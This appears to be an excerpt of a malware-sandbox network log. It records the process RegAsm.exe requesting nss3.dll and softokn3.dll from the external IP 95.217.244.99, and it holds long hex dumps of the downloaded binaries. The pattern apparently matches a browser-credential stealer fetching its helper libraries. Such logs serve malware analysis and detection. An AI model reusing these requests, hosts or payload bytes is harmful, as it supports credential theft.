2024-04-23 19:44:15 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-23 19:44:15 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-23 19:44:15 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49723	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:16 UTC	154	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Cache-Control: no-cache
2024-04-23 19:44:17 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:16 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-04-23 19:44:17 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-23 19:44:17 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49724	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:19 UTC	158	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Cache-Control: no-cache
2024-04-23 19:44:19 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:19 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-23 19:44:19 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-23 19:44:19 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-23 19:44:19 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-23 19:44:20 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-23 19:44:20 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-23 19:44:20 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-04-23 19:44:20 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
